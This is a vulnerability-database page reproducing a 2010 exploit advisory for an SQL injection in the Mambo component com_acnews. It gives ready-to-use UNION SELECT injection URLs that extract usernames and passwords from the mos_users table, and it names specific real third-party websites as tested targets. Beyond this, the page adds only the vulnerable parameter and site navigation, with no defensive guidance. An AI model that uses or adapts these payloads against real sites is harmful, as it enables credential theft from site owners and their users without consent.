|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  World Laboratory of Bugtraq Database |
||||||||||
SecurityAlert : None
Credit : Ro0T-MaFia SecurityRisk : Medium  (About) Remote : Yes Local : No Status : Bug
Text : # Title: Mambo Component com_acnews [id] | SQL Injection # Date: 15/02/2010 # Author: Ro0T-MaFia # Software Link: .... # Version: ... # Tested on: http://www.artcommedia.com/index.php?option=com_acnews&page=1&Itemi d=-1+UNION+SELECT+1,2,concat%28username,0x20,password%29,4,5,6,7,8,9,10,11, 12,13,14,15,16,17%20from%20mos_users-- --- Mambo Component com_acnews [id] | SQL Injection Author: Zero Bits & Xzit3 Team: Ro0T-MaFia Member's: Zero Bits, CMD, Jeferx, Xzit3, XP3RM4 & Jeferx Date: 15/02/2010 Contact: Zer_Bits@GobiernoFederal.com - wscalle1@e-r00t.org<mailto:wscalle1@e-r00t.org> Country: Venezuela - Mexico ############################ Vulnerability's: [+] SQL Injection: Error: You have an error in your SQL syntax. BUG: index.php?lang=en&option=com_acnews&task=view&id=188(SQLi) Real example: http://www.artcom.net/index.php?lang=en&option=com_acnews&task=view &id=-188'&Itemid=136&page=0 (Web Vuln.) http://www.artcom.de/index.php?lang=en&option=com_acnews&task=view& amp;id=331%27&page=0 http://www.artcommedia.com/index.php?option=com_acnews&page=1&Itemi d=-1+UNION+SELECT+1,2,concat%28username,0x20,password%29,4,5,6,7,8,9,10,11, 12,13,14,15,16,17%20from%20mos_users-- ########################### Audyt bezpieczeństwaSecurity AuditAnaliza powłamaniowa References : None If you want change this note, please use UCP
|
||||||||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |